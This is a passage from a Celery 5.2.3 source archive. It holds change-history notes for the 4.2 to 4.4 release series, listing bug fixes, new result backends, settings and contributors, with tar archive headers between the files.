Python 2/3 compatibility (#4166) Contributed by :github_user:`fmind` && **Omer Katz**. - **Group Result**: Fix current_app fallback in GroupResult.restore() (#4431) Contributed by **Alex Hill**. - **Consul Backend**: Correct key string type for Python 2/3 compatibility (#4416) Contributed by **Wido den Hollander**. - **Group Result**: Correctly restore an empty GroupResult (#2202) (#4427) Contributed by **Alex Hill** & **Omer Katz**. - **Result**: Disable synchronous waiting for sub-tasks on eager mode(#4322) Contributed by **Denis Podlesniy**. - **Celery Beat**: Detect timezone or Daylight Saving Time changes (#1604) (#4403) Contributed by **Vincent Barbaresi**. - **Canvas**: Fix append to an empty chain. Fixes #4047. (#4402) Contributed by **Omer Katz**. - **Task**: Allow shadow to override task name in trace and logging messages. (#4379) Contributed by :github_user:`hclihn`. - **Documentation/Sphinx**: Fix getfullargspec Python 2.x compatibility in contrib/sphinx.py (#4399) Contributed by **Javier Martin Montull**. - **Documentation**: Updated installation instructions for SQS broker (#4382) Contributed by **Sergio Fernandez**. - **Celery Beat**: Better equality comparison for ScheduleEntry instances (#4312) Contributed by :github_user:`mariia-zelenova`. - **Task**: Adding 'shadow' property to as_task_v2 (#4350) Contributed by **Marcelo Da Cruz Pinto**. - Try to import directly, do not use deprecated imp method (#4216) Contributed by **Tobias Kunze**. - **Task**: Enable `kwargsrepr` and `argsrepr` override for modifying task argument representation (#4260) Contributed by **James M. Allen**. - **Result Backend**: Add Redis Sentinel backend (#4144) Contributed by **Geoffrey Bauduin**. - Use unique time values for Collections/LimitedSet (#3879 and #3891) (#3892) Contributed by :github_user:`lead2gold`. - **CI**: Report coverage for all result backends. Contributed by **Omer Katz**. - **Django**: Use Django DB max age connection setting (fixes #4116) (#4292) Contributed by **Marco Schweighauser**. - **Canvas**: Properly take into account chain tasks link_error (#4240) Contributed by :github_user:`agladkov`. - **Canvas**: Allow to create group with single task (fixes issue #4255) (#4280) Contributed by :github_user:`agladkov`. - **Canvas**: Copy dictionary parameter in chord.from_dict before modifying (fixes issue #4223) (#4278) Contributed by :github_user:`agladkov`. - **Results Backend**: Add Cassandra options (#4224) Contributed by **Scott Cooper**. - **Worker**: Apply rate limiting for tasks with ETA (#4251) Contributed by :github_user:`arpanshah29`. - **Celery Beat**: support scheduler entries without a schedule (#4235) Contributed by **Markus Kaiserswerth**. - **SQS Broker**: Updated SQS requirements file with correct boto3 version (#4231) Contributed by **Alejandro Varas**. - Remove unused code from _create_app contextmanager (#4204) Contributed by **Ryan P Kilby**. - **Group Result**: Modify GroupResult.as_tuple() to include parent (fixes #4106) (#4205) Contributed by :github_user:`pachewise`. - **Beat**: Set default scheduler class in beat command. (#4189) Contributed by :github_user:`Kxrr`. - **Worker**: Retry signal receiver after raised exception (#4192) Contributed by **David Davis**. - **Task**: Allow custom Request class for tasks (#3977) Contributed by **Manuel Vázquez Acosta**. - **Django**: Django fixup should close all cache backends (#4187) Contributed by **Raphaël Riel**. - **Deployment**: Adds stopasgroup to the supervisor scripts (#4200) Contributed by :github_user:`martialp`. - Using Exception.args to serialize/deserialize exceptions (#4085) Contributed by **Alexander Ovechkin**. - **Timezones**: Correct calculation of application current time with timezone (#4173) Contributed by **George Psarakis**. - **Remote Debugger**: Set the SO_REUSEADDR option on the socket (#3969) Contributed by **Theodore Dubois**. - **Django**: Celery ignores exceptions raised during `django.setup()` (#4146) Contributed by **Kevin Gu**. - Use heartbeat setting from application configuration for Broker connection (#4148) Contributed by :github_user:`mperice`. - **Celery Beat**: Fixed exception caused by next_transit receiving an unexpected argument. (#4103) Contributed by **DDevine**. - **Task** Introduce exponential backoff with Task auto-retry (#4101) Contributed by **David Baumgold**. - **AsyncResult**: Remove weak-references to bound methods in AsyncResult promises. (#4131) Contributed by **Vinod Chandru**. - **Development/Testing**: Allow eager application of canvas structures (#4576) Contributed by **Nicholas Pilon**. - **Command Line**: Flush stderr before exiting with error code 1. Contributed by **Antonin Delpeuch**. - **Task**: Escapes single quotes in kwargsrepr strings. Contributed by **Kareem Zidane** - **AsyncResult**: Restore ability to join over ResultSet after fixing celery/#3818. Contributed by **Derek Harland** - **Redis Results Backend**: Unsubscribe on message success. Previously Celery would leak channels, filling the memory of the Redis instance. Contributed by **George Psarakis** - **Task**: Only convert eta to isoformat when it is not already a string. Contributed by **Omer Katz** - **Redis Results Backend**: The result_backend setting now supports rediss:// URIs Contributed by **James Remeika** - **Canvas** Keyword arguments are passed to tasks in chain as expected. Contributed by :github_user:`tothegump` - **Django** Fix a regression causing Celery to crash when using Django. Contributed by **Jonas Haag** - **Canvas** Chain with one task now runs as expected. Contributed by :github_user:`tothegump` - **Kombu** Celery 4.2 now requires Kombu 4.2 or better. Contributed by **Omer Katz & Asif Saifuddin Auvi** - `GreenletExit` is not in `__all__` in greenlet.py which can not be imported by Python 3.6. The import was adjusted to work on Python 3.6 as well. Contributed by **Hsiaoming Yang** - Fixed a regression that occurred during the development of Celery 4.2 which caused `celery report` to crash when Django is installed. Contributed by **Josue Balandrano Coronel** - Matched the behavior of `GroupResult.as_tuple()` to that of `AsyncResult.as_tuple()`. The group's parent is now serialized correctly. Contributed by **Josue Balandrano Coronel** - Use Redis coercion mechanism for converting URI query parameters. Contributed by **Justin Patrin** - Fixed the representation of `GroupResult`. The dependency graph is now presented correctly. Contributed by **Josue Balandrano Coronel** Documentation, CI, Installation and Tests fixes: - **Sammie S. Taunton** - **Dan Wilson** - :github_user:`pachewise` - **Sergi Almacellas Abellana** - **Omer Katz** - **Alex Zaitsev** - **Leo Singer** - **Rachel Johnson** - **Jon Dufresne** - **Samuel Dion-Girardeau** - **Ryan Guest** - **Huang Huang** - **Geoffrey Bauduin** - **Andrew Wong** - **Mads Jensen** - **Jackie Leng** - **Harry Moreno** - :github_user:`michael-k` - **Nicolas Mota** - **Armenak Baburyan** - **Patrick Zhang** - :github_user:`anentropic` - :github_user:`jairojair` - **Ben Welsh** - **Michael Peake** - **Fengyuan Chen** - :github_user:`arpanshah29` - **Xavier Hardy** - **Shitikanth** - **Igor Kasianov** - **John Arnold** - :github_user:`dmollerm` - **Robert Knight** - **Asif Saifuddin Auvi** - **Eduardo Ramírez** - **Kamil Breguła** - **Juan Gutierrez** ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-4.3.rst0000664000175000017500000004154300000000000020320 0ustar00asifasif00000000000000.. _changelog-4.3: ================ Change history ================ This document contains change notes for bugfix releases in the 4.3.x series, please see :ref:`whatsnew-4.3` for an overview of what's new in Celery 4.3. 4.3.1 ===== :release-date: 2020-09-10 1:00 P.M UTC+3:00 :release-by: Omer Katz - Limit vine version to be below 5.0.0. Contributed by **Omer Katz** 4.3.0 ===== :release-date: 2019-03-31 7:00 P.M UTC+3:00 :release-by: Omer Katz - Added support for broadcasting using a regular expression pattern or a glob pattern to multiple Pidboxes. This allows you to inspect or ping multiple workers at once. Contributed by **Dmitry Malinovsky** & **Jason Held** - Added support for PEP 420 namespace packages. This allows you to load tasks from namespace packages. Contributed by **Colin Watson** - Added :setting:`acks_on_failure_or_timeout` as a setting instead of a task only option. This was missing from the original PR but now added for completeness. Contributed by **Omer Katz** - Added the :signal:`task_received` signal. Contributed by **Omer Katz** - Fixed a crash of our CLI that occurred for everyone using Python < 3.6. The crash was introduced in `acd6025 `_ by using the :class:`ModuleNotFoundError` exception which was introduced in Python 3.6. Contributed by **Omer Katz** - Fixed a crash that occurred when using the Redis result backend while the :setting:`result_expires` is set to None. Contributed by **Toni Ruža** & **Omer Katz** - Added support the `DNS seedlist connection format `_ for the MongoDB result backend. This requires the `dnspython` package which will be installed by default when installing the dependencies for the MongoDB result backend. Contributed by **George Psarakis** - Bump the minimum eventlet version to 0.24.1. Contributed by **George Psarakis** - Replace the `msgpack-python` package with `msgpack`. We're no longer using the deprecated package. See our :ref:`important notes ` for this release for further details on how to upgrade. Contributed by **Daniel Hahler** - Allow scheduling error handlers which are not registered tasks in the current worker. These kind of error handlers are now possible: .. code-block:: python from celery import Signature Signature( 'bar', args=['foo'], link_error=Signature('msg.err', queue='msg') ).apply_async() - Additional fixes and enhancements to the SSL support of the Redis broker and result backend. Contributed by **Jeremy Cohen** Code Cleanups, Test Coverage & CI Improvements by: - **Omer Katz** - **Florian Chardin** Documentation Fixes by: - **Omer Katz** - **Samuel Huang** - **Amir Hossein Saeid Mehr** - **Dmytro Litvinov** 4.3.0 RC2 ========= :release-date: 2019-03-03 9:30 P.M UTC+2:00 :release-by: Omer Katz - **Filesystem Backend**: Added meaningful error messages for filesystem backend. Contributed by **Lars Rinn** - **New Result Backend**: Added the ArangoDB backend. Contributed by **Dilip Vamsi Moturi** - **Django**: Prepend current working directory instead of appending so that the project directory will have precedence over system modules as expected. Contributed by **Antonin Delpeuch** - Bump minimum py-redis version to 3.2.0. Due to multiple bugs in earlier versions of py-redis that were causing issues for Celery, we were forced to bump the minimum required version to 3.2.0. Contributed by **Omer Katz** - **Dependencies**: Bump minimum required version of Kombu to 4.4 Contributed by **Omer Katz** 4.3.0 RC1 ========= :release-date: 2019-02-20 5:00 PM IST :release-by: Omer Katz - **Canvas**: :meth:`celery.chain.apply` does not ignore keyword arguments anymore when applying the chain. Contributed by **Korijn van Golen** - **Result Set**: Don't attempt to cache results in a :class:`celery.result.ResultSet`. During a join, the results cache was populated using :meth:`celery.result.ResultSet.get`, if one of the results contains an exception, joining unexpectedly failed. The results cache is now removed. Contributed by **Derek Harland** - **Application**: :meth:`celery.Celery.autodiscover_tasks` now attempts to import the package itself when the `related_name` keyword argument is `None`. Contributed by **Alex Ioannidis** - **Windows Support**: On Windows 10, stale PID files prevented celery beat to run. We now remove them when a :class:`SystemExit` is raised. Contributed by **:github_user:`na387`** - **Task**: Added the new :setting:`task_acks_on_failure_or_timeout` setting. Acknowledging SQS messages on failure or timing out makes it impossible to use dead letter queues. We introduce the new option acks_on_failure_or_timeout, to ensure we can totally fallback on native SQS message lifecycle, using redeliveries for retries (in case of slow processing or failure) and transitions to dead letter queue after defined number of times. Contributed by **Mario Kostelac** - **RabbitMQ Broker**: Adjust HA headers to work on RabbitMQ 3.x. This change also means we're ending official support for RabbitMQ 2.x. Contributed by **Asif Saif Uddin** - **Command Line**: Improve :program:`celery update` error handling. Contributed by **Federico Bond** - **Canvas**: Support chords with :setting:`task_always_eager` set to `True`. Contributed by **Axel Haustant** - **Result Backend**: Optionally store task properties in result backend. Setting the :setting:`result_extended` configuration option to `True` enables storing additional task properties in the result backend. Contributed by **John Arnold** - **Couchbase Result Backend**: Allow the Couchbase result backend to automatically detect the serialization format. Contributed by **Douglas Rohde** - **New Result Backend**: Added the Azure Block Blob Storage result backend. The backend is implemented on top of the azure-storage library which uses Azure Blob Storage for a scalable low-cost PaaS backend. The backend was load tested via a simple nginx/gunicorn/sanic app hosted on a DS4 virtual machine (4 vCores, 16 GB RAM) and was able to handle 600+ concurrent users at ~170 RPS. The commit also contains a live end-to-end test to facilitate verification of the backend functionality. The test is activated by setting the `AZUREBLOCKBLOB_URL` environment variable to `azureblockblob://{ConnectionString}` where the value for `ConnectionString` can be found in the `Access Keys` pane of a Storage Account resources in the Azure Portal. Contributed by **Clemens Wolff** - **Task**: :meth:`celery.app.task.update_state` now accepts keyword arguments. This allows passing extra fields to the result backend. These fields are unused by default but custom result backends can use them to determine how to store results. Contributed by **Christopher Dignam** - Gracefully handle consumer :class:`kombu.exceptions.DecodeError`. When using the v2 protocol the worker no longer crashes when the consumer encounters an error while decoding a message. Contributed by **Steven Sklar** - **Deployment**: Fix init.d service stop. Contributed by **Marcus McHale** - **Django**: Drop support for Django < 1.11. Contributed by **Asif Saif Uddin** - **Django**: Remove old djcelery loader. Contributed by **Asif Saif Uddin** - **Result Backend**: :class:`celery.worker.request.Request` now passes :class:`celery.app.task.Context` to the backend's store_result functions. Since the class currently passes `self` to these functions, revoking a task resulted in corrupted task result data when django-celery-results was used. Contributed by **Kiyohiro Yamaguchi** - **Worker**: Retry if the heartbeat connection dies. Previously, we keep trying to write to the broken connection. This results in a memory leak because the event dispatcher will keep appending the message to the outbound buffer. Contributed by **Raf Geens** - **Celery Beat**: Handle microseconds when scheduling. Contributed by **K Davis** - **Asynpool**: Fixed deadlock when closing socket. Upon attempting to close a socket, :class:`celery.concurrency.asynpool.AsynPool` only removed the queue writer from the hub but did not remove the reader. This led to a deadlock on the file descriptor and eventually the worker stopped accepting new tasks. We now close both the reader and the writer file descriptors in a single loop iteration which prevents the deadlock. Contributed by **Joshua Engelman** - **Celery Beat**: Correctly consider timezone when calculating timestamp. Contributed by **:github_user:`yywing`** - **Celery Beat**: :meth:`celery.beat.Scheduler.schedules_equal` can now handle either arguments being a `None` value. Contributed by **:github_user:` ratson`** - **Documentation/Sphinx**: Fixed Sphinx support for shared_task decorated functions. Contributed by **Jon Banafato** - **New Result Backend**: Added the CosmosDB result backend. This change adds a new results backend. The backend is implemented on top of the pydocumentdb library which uses Azure CosmosDB for a scalable, globally replicated, high-performance, low-latency and high-throughput PaaS backend. Contributed by **Clemens Wolff** - **Application**: Added configuration options to allow separate multiple apps to run on a single RabbitMQ vhost. The newly added :setting:`event_exchange` and :setting:`control_exchange` configuration options allow users to use separate Pidbox exchange and a separate events exchange. This allow different Celery applications to run separately on the same vhost. Contributed by **Artem Vasilyev** - **Result Backend**: Forget parent result metadata when forgetting a result. Contributed by **:github_user:`tothegump`** - **Task** Store task arguments inside :class:`celery.exceptions.MaxRetriesExceededError`. Contributed by **Anthony Ruhier** - **Result Backend**: Added the :setting:`result_accept_content` setting. This feature allows to configure different accepted content for the result backend. A special serializer (`auth`) is used for signed messaging, however the result_serializer remains in json, because we don't want encrypted content in our result backend. To accept unsigned content from the result backend, we introduced this new configuration option to specify the accepted content from the backend. Contributed by **Benjamin Pereto** - **Canvas**: Fixed error callback processing for class based tasks. Contributed by **Victor Mireyev** - **New Result Backend**: Added the S3 result backend. Contributed by **Florian Chardin** - **Task**: Added support for Cythonized Celery tasks. Contributed by **Andrey Skabelin** - **Riak Result Backend**: Warn Riak backend users for possible Python 3.7 incompatibilities. Contributed by **George Psarakis** - **Python Runtime**: Added Python 3.7 support. Contributed by **Omer Katz** & **Asif Saif Uddin** - **Auth Serializer**: Revamped the auth serializer. The auth serializer received a complete overhaul. It was previously horribly broken. We now depend on cryptography instead of pyOpenSSL for this serializer. Contributed by **Benjamin Pereto** - **Command Line**: :program:`celery report` now reports kernel version along with other platform details. Contributed by **Omer Katz** - **Canvas**: Fixed chords with chains which include sub chords in a group. Celery now correctly executes the last task in these types of canvases: .. code-block:: python c = chord( group([ chain( dummy.si(), chord( group([dummy.si(), dummy.si()]), dummy.si(), ), ), chain( dummy.si(), chord( group([dummy.si(), dummy.si()]), dummy.si(), ), ), ]), dummy.si() ) c.delay().get() Contributed by **Maximilien Cuony** - **Canvas**: Complex canvases with error callbacks no longer raises an :class:`AttributeError`. Very complex canvases such as `this `_ no longer raise an :class:`AttributeError` which prevents constructing them. We do not know why this bug occurs yet. Contributed by **Manuel Vázquez Acosta** - **Command Line**: Added proper error messages in cases where app cannot be loaded. Previously, celery crashed with an exception. We now print a proper error message. Contributed by **Omer Katz** - **Task**: Added the :setting:`task_default_priority` setting. You can now set the default priority of a task using the :setting:`task_default_priority` setting. The setting's value will be used if no priority is provided for a specific task. Contributed by **:github_user:`madprogrammer`** - **Dependencies**: Bump minimum required version of Kombu to 4.3 and Billiard to 3.6. Contributed by **Asif Saif Uddin** - **Result Backend**: Fix memory leak. We reintroduced weak references to bound methods for AsyncResult callback promises, after adding full weakref support for Python 2 in `vine `_. More details can be found in `celery/celery#4839 `_. Contributed by **George Psarakis** and **:github_user:`monsterxx03`**. - **Task Execution**: Fixed roundtrip serialization for eager tasks. When doing the roundtrip serialization for eager tasks, the task serializer will always be JSON unless the `serializer` argument is present in the call to :meth:`celery.app.task.Task.apply_async`. If the serializer argument is present but is `'pickle'`, an exception will be raised as pickle-serialized objects cannot be deserialized without specifying to `serialization.loads` what content types should be accepted. The Producer's `serializer` seems to be set to `None`, causing the default to JSON serialization. We now continue to use (in order) the `serializer` argument to :meth:`celery.app.task.Task.apply_async`, if present, or the `Producer`'s serializer if not `None`. If the `Producer`'s serializer is `None`, it will use the Celery app's `task_serializer` configuration entry as the serializer. Contributed by **Brett Jackson** - **Redis Result Backend**: The :class:`celery.backends.redis.ResultConsumer` class no longer assumes :meth:`celery.backends.redis.ResultConsumer.start` to be called before :meth:`celery.backends.redis.ResultConsumer.drain_events`. This fixes a race condition when using the Gevent workers pool. Contributed by **Noam Kush** - **Task**: Added the :setting:`task_inherit_parent_priority` setting. Setting the :setting:`task_inherit_parent_priority` configuration option to `True` will make Celery tasks inherit the priority of the previous task linked to it. Examples: .. code-block:: python c = celery.chain( add.s(2), # priority=None add.s(3).set(priority=5), # priority=5 add.s(4), # priority=5 add.s(5).set(priority=3), # priority=3 add.s(6), # priority=3 ) .. code-block:: python @app.task(bind=True) def child_task(self): pass @app.task(bind=True) def parent_task(self): child_task.delay() # child_task will also have priority=5 parent_task.apply_async(args=[], priority=5) Contributed by **:github_user:`madprogrammer`** - **Canvas**: Added the :setting:`result_chord_join_timeout` setting. Previously, :meth:`celery.result.GroupResult.join` had a fixed timeout of 3 seconds. The :setting:`result_chord_join_timeout` setting now allows you to change it. Contributed by **:github_user:`srafehi`** Code Cleanups, Test Coverage & CI Improvements by: - **Jon Dufresne** - **Asif Saif Uddin** - **Omer Katz** - **Brett Jackson** - **Bruno Alla** - **:github_user:`tothegump`** - **Bojan Jovanovic** - **Florian Chardin** - **:github_user:`walterqian`** - **Fabian Becker** - **Lars Rinn** - **:github_user:`madprogrammer`** - **Ciaran Courtney** Documentation Fixes by: - **Lewis M. Kabui** - **Dash Winterson** - **Shanavas M** - **Brett Randall** - **Przemysław Suliga** - **Joshua Schmid** - **Asif Saif Uddin** - **Xiaodong** - **Vikas Prasad** - **Jamie Alessio** - **Lars Kruse** - **Guilherme Caminha** - **Andrea Rabbaglietti** - **Itay Bittan** - **Noah Hall** - **Peng Weikang** - **Mariatta Wijaya** - **Ed Morley** - **Paweł Adamczak** - **:github_user:`CoffeeExpress`** - **:github_user:`aviadatsnyk`** - **Brian Schrader** - **Josue Balandrano Coronel** - **Tom Clancy** - **Sebastian Wojciechowski** - **Meysam Azad** - **Willem Thiart** - **Charles Chan** - **Omer Katz** - **Milind Shakya** ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/history/changelog-4.4.rst0000664000175000017500000005741400000000000020325 0ustar00asifasif00000000000000.. _changelog-4.4: =============== Change history =============== This document contains change notes for bugfix & new features in the 4.4.x series, please see :ref:`whatsnew-4.4` for an overview of what's new in Celery 4.4. 4.4.7 ======= :release-date: 2020-07-31 11.45 P.M UTC+6:00 :release-by: Asif Saif Uddin - Add task_received, task_rejected and task_unknown to signals module. - [ES backend] add 401 as safe for retry. - treat internal errors as failure. - Remove redis fanout caveats. - FIX: -A and --args should behave the same. (#6223) - Class-based tasks autoretry (#6233) - Preserve order of group results with Redis result backend (#6218) - Replace future with celery.five Fixes #6250, and use raise_with_context instead of reraise - Fix REMAP_SIGTERM=SIGQUIT not working - (Fixes#6258) MongoDB: fix for serialization issue (#6259) - Make use of ordered sets in Redis opt-in - Test, CI, Docker & style and minor doc improvements. 4.4.6 ======= :release-date: 2020-06-24 2.40 P.M UTC+6:00 :release-by: Asif Saif Uddin - Remove autoscale force_scale methods (#6085). - Fix autoscale test - Pass ping destination to request - chord: merge init options with run options - Put back KeyValueStoreBackend.set method without state - Added --range-prefix option to `celery multi` (#6180) - Added as_list function to AsyncResult class (#6179) - Fix CassandraBackend error in threads or gevent pool (#6147) - Kombu 4.6.11 4.4.5 ======= :release-date: 2020-06-08 12.15 P.M UTC+6:00 :release-by: Asif Saif Uddin - Add missing dependency on future (#6146). - ElasticSearch: Retry index if document was deleted between index - fix windows build - Customize the retry interval of chord_unlock tasks - fix multi tests in local 4.4.4 ======= :release-date: 2020-06-03 11.00 A.M UTC+6:00 :release-by: Asif Saif Uddin - Fix autoretry_for with explicit retry (#6138). - Kombu 4.6.10 - Use Django DB max age connection setting (fixes #4116). - Add retry on recoverable exception for the backend (#6122). - Fix random distribution of jitter for exponential backoff. - ElasticSearch: add setting to save meta as json. - fix #6136. celery 4.4.3 always trying create /var/run/celery directory. - Add task_internal_error signal (#6049). 4.4.3 ======= :release-date: 2020-06-01 4.00 P.M UTC+6:00 :release-by: Asif Saif Uddin - Fix backend utf-8 encoding in s3 backend . - Kombu 4.6.9 - Task class definitions can have retry attributes (#5869) - Upgraded pycurl to the latest version that supports wheel. - Add uptime to the stats inspect command - Fixing issue #6019: unable to use mysql SSL parameters when getting - Clean TraceBack to reduce memory leaks for exception task (#6024) - exceptions: NotRegistered: fix up language - Give up sending a worker-offline message if transport is not connected - Add Task to __all__ in celery.__init__.py - Ensure a single chain object in a chain does not raise MaximumRecursion - Fix autoscale when prefetch_multiplier is 1 - Allow start_worker to function without ping task - Update celeryd.conf - Fix correctly handle configuring the serializer for always_eager mode. - Remove doubling of prefetch_count increase when prefetch_multiplier - Fix eager function not returning result after retries - return retry result if not throw and is_eager - Always requeue while worker lost regardless of the redelivered flag - Allow relative paths in the filesystem backend (#6070) - [Fixed Issue #6017] - Avoid race condition due to task duplication. - Exceptions must be old-style classes or derived from BaseException - Fix windows build (#6104) - Add encode to meta task in base.py (#5894) - Update time.py to solve the microsecond issues (#5199) - Change backend _ensure_not_eager error to warning - Add priority support for 'celery.chord_unlock' task (#5766) - Change eager retry behaviour - Avoid race condition in elasticsearch backend - backends base get_many pass READY_STATES arg - Add integration tests for Elasticsearch and fix _update - feat(backend): Adds cleanup to ArangoDB backend - remove jython check - fix filesystem backend cannot not be serialized by picked 4.4.0 ======= :release-date: 2019-12-16 9.45 A.M UTC+6:00 :release-by: Asif Saif Uddin - This version is officially supported on CPython 2.7, 3.5, 3.6, 3.7 & 3.8 and is also supported on PyPy2 & PyPy3. - Kombu 4.6.7 - Task class definitions can have retry attributes (#5869) 4.4.0rc5 ======== :release-date: 2019-12-07 21.05 A.M UTC+6:00 :release-by: Asif Saif Uddin - Kombu 4.6.7 - Events bootstep disabled if no events (#5807) - SQS - Reject on failure (#5843) - Add a concurrency model with ThreadPoolExecutor (#5099) - Add auto expiry for DynamoDB backend (#5805) - Store extending result in all backends (#5661) - Fix a race condition when publishing a very large chord header (#5850) - Improve docs and test matrix 4.4.0rc4 ======== :release-date: 2019-11-11 00.45 A.M UTC+6:00 :release-by: Asif Saif Uddin - Kombu 4.6.6 - Py-AMQP 2.5.2 - Python 3.8 - Numerious bug fixes - PyPy 7.2 4.4.0rc3 ======== :release-date: 2019-08-14 23.00 P.M UTC+6:00 :release-by: Asif Saif Uddin - Kombu 4.6.4 - Billiard 3.6.1 - Py-AMQP 2.5.1 - Avoid serializing datetime (#5606) - Fix: (group() | group()) not equals single group (#5574) - Revert "Broker connection uses the heartbeat setting from app config. - Additional file descriptor safety checks. - fixed call for null args (#5631) - Added generic path for cache backend. - Fix Nested group(chain(group)) fails (#5638) - Use self.run() when overriding __call__ (#5652) - Fix termination of asyncloop (#5671) - Fix migrate task to work with both v1 and v2 of the message protocol. - Updating task_routes config during runtime now have effect. 4.4.0rc2 ======== :release-date: 2019-06-15 4:00 A.M UTC+6:00 :release-by: Asif Saif Uddin - Many bugs and regressions fixed. - Kombu 4.6.3 4.4.0rc1 ======== :release-date: 2019-06-06 1:00 P.M UTC+6:00 :release-by: Asif Saif Uddin - Python 3.4 drop - Kombu 4.6.1 - Replace deprecated PyMongo methods usage (#5443) - Pass task request when calling update_state (#5474) - Fix bug in remaining time calculation in case of DST time change (#5411) - Fix missing task name when requesting extended result (#5439) - Fix `collections` import issue on Python 2.7 (#5428) - handle `AttributeError` in base backend exception deserializer (#5435) - Make `AsynPool`'s `proc_alive_timeout` configurable (#5476) - AMQP Support for extended result (#5495) - Fix SQL Alchemy results backend to work with extended result (#5498) - Fix restoring of exceptions with required param (#5500) - Django: Re-raise exception if `ImportError` not caused by missing tasks module (#5211) - Django: fixed a regression putting DB connections in invalid state when `CONN_MAX_AGE != 0` (#5515) - Fixed `OSError` leading to lost connection to broker (#4457) - Fixed an issue with inspect API unable get details of Request - Fix mogodb backend authentication (#5527) - Change column type for Extended Task Meta args/kwargs to LargeBinary - Handle http_auth in Elasticsearch backend results (#5545) - Fix task serializer being ignored with `task_always_eager=True` (#5549) - Fix `task.replace` to work in `.apply() as well as `.apply_async()` (#5540) - Fix sending of `worker_process_init` signal for solo worker (#5562) - Fix exception message upacking (#5565) - Add delay parameter function to beat_schedule (#5558) - Multiple documentation updates 4.3.0 ===== :release-date: 2019-03-31 7:00 P.M UTC+3:00 :release-by: Omer Katz - Added support for broadcasting using a regular expression pattern or a glob pattern to multiple Pidboxes. This allows you to inspect or ping multiple workers at once. Contributed by **Dmitry Malinovsky** & **Jason Held** - Added support for PEP 420 namespace packages. This allows you to load tasks from namespace packages. Contributed by **Colin Watson** - Added :setting:`acks_on_failure_or_timeout` as a setting instead of a task only option. This was missing from the original PR but now added for completeness. Contributed by **Omer Katz** - Added the :signal:`task_received` signal. Contributed by **Omer Katz** - Fixed a crash of our CLI that occurred for everyone using Python < 3.6. The crash was introduced in `acd6025 `_ by using the :class:`ModuleNotFoundError` exception which was introduced in Python 3.6. Contributed by **Omer Katz** - Fixed a crash that occurred when using the Redis result backend while the :setting:`result_expires` is set to None. Contributed by **Toni Ruža** & **Omer Katz** - Added support the `DNS seedlist connection format `_ for the MongoDB result backend. This requires the `dnspython` package which will be installed by default when installing the dependencies for the MongoDB result backend. Contributed by **George Psarakis** - Bump the minimum eventlet version to 0.24.1. Contributed by **George Psarakis** - Replace the `msgpack-python` package with `msgpack`. We're no longer using the deprecated package. See our :ref:`important notes ` for this release for further details on how to upgrade. Contributed by **Daniel Hahler** - Allow scheduling error handlers which are not registered tasks in the current worker. These kind of error handlers are now possible: .. code-block:: python from celery import Signature Signature( 'bar', args=['foo'], link_error=Signature('msg.err', queue='msg') ).apply_async() - Additional fixes and enhancements to the SSL support of the Redis broker and result backend. Contributed by **Jeremy Cohen** Code Cleanups, Test Coverage & CI Improvements by: - **Omer Katz** - **Florian Chardin** Documentation Fixes by: - **Omer Katz** - **Samuel Huang** - **Amir Hossein Saeid Mehr** - **Dmytro Litvinov** 4.3.0 RC2 ========= :release-date: 2019-03-03 9:30 P.M UTC+2:00 :release-by: Omer Katz - **Filesystem Backend**: Added meaningful error messages for filesystem backend. Contributed by **Lars Rinn** - **New Result Backend**: Added the ArangoDB backend. Contributed by **Dilip Vamsi Moturi** - **Django**: Prepend current working directory instead of appending so that the project directory will have precedence over system modules as expected. Contributed by **Antonin Delpeuch** - Bump minimum py-redis version to 3.2.0. Due to multiple bugs in earlier versions of py-redis that were causing issues for Celery, we were forced to bump the minimum required version to 3.2.0. Contributed by **Omer Katz** - **Dependencies**: Bump minimum required version of Kombu to 4.4 Contributed by **Omer Katz** 4.3.0 RC1 ========= :release-date: 2019-02-20 5:00 PM IST :release-by: Omer Katz - **Canvas**: :meth:`celery.chain.apply` does not ignore keyword arguments anymore when applying the chain. Contributed by **Korijn van Golen** - **Result Set**: Don't attempt to cache results in a :class:`celery.result.ResultSet`. During a join, the results cache was populated using :meth:`celery.result.ResultSet.get`, if one of the results contains an exception, joining unexpectedly failed. The results cache is now removed. Contributed by **Derek Harland** - **Application**: :meth:`celery.Celery.autodiscover_tasks` now attempts to import the package itself when the `related_name` keyword argument is `None`. Contributed by **Alex Ioannidis** - **Windows Support**: On Windows 10, stale PID files prevented celery beat to run. We now remove them when a :class:`SystemExit` is raised. Contributed by **:github_user:`na387`** - **Task**: Added the new :setting:`task_acks_on_failure_or_timeout` setting. Acknowledging SQS messages on failure or timing out makes it impossible to use dead letter queues. We introduce the new option acks_on_failure_or_timeout, to ensure we can totally fallback on native SQS message lifecycle, using redeliveries for retries (in case of slow processing or failure) and transitions to dead letter queue after defined number of times. Contributed by **Mario Kostelac** - **RabbitMQ Broker**: Adjust HA headers to work on RabbitMQ 3.x. This change also means we're ending official support for RabbitMQ 2.x. Contributed by **Asif Saif Uddin** - **Command Line**: Improve :program:`celery update` error handling. Contributed by **Federico Bond** - **Canvas**: Support chords with :setting:`task_always_eager` set to `True`. Contributed by **Axel Haustant** - **Result Backend**: Optionally store task properties in result backend. Setting the :setting:`result_extended` configuration option to `True` enables storing additional task properties in the result backend. Contributed by **John Arnold** - **Couchbase Result Backend**: Allow the Couchbase result backend to automatically detect the serialization format. Contributed by **Douglas Rohde** - **New Result Backend**: Added the Azure Block Blob Storage result backend. The backend is implemented on top of the azure-storage library which uses Azure Blob Storage for a scalable low-cost PaaS backend. The backend was load tested via a simple nginx/gunicorn/sanic app hosted on a DS4 virtual machine (4 vCores, 16 GB RAM) and was able to handle 600+ concurrent users at ~170 RPS. The commit also contains a live end-to-end test to facilitate verification of the backend functionality. The test is activated by setting the `AZUREBLOCKBLOB_URL` environment variable to `azureblockblob://{ConnectionString}` where the value for `ConnectionString` can be found in the `Access Keys` pane of a Storage Account resources in the Azure Portal. Contributed by **Clemens Wolff** - **Task**: :meth:`celery.app.task.update_state` now accepts keyword arguments. This allows passing extra fields to the result backend. These fields are unused by default but custom result backends can use them to determine how to store results. Contributed by **Christopher Dignam** - Gracefully handle consumer :class:`kombu.exceptions.DecodeError`. When using the v2 protocol the worker no longer crashes when the consumer encounters an error while decoding a message. Contributed by **Steven Sklar** - **Deployment**: Fix init.d service stop. Contributed by **Marcus McHale** - **Django**: Drop support for Django < 1.11. Contributed by **Asif Saif Uddin** - **Django**: Remove old djcelery loader. Contributed by **Asif Saif Uddin** - **Result Backend**: 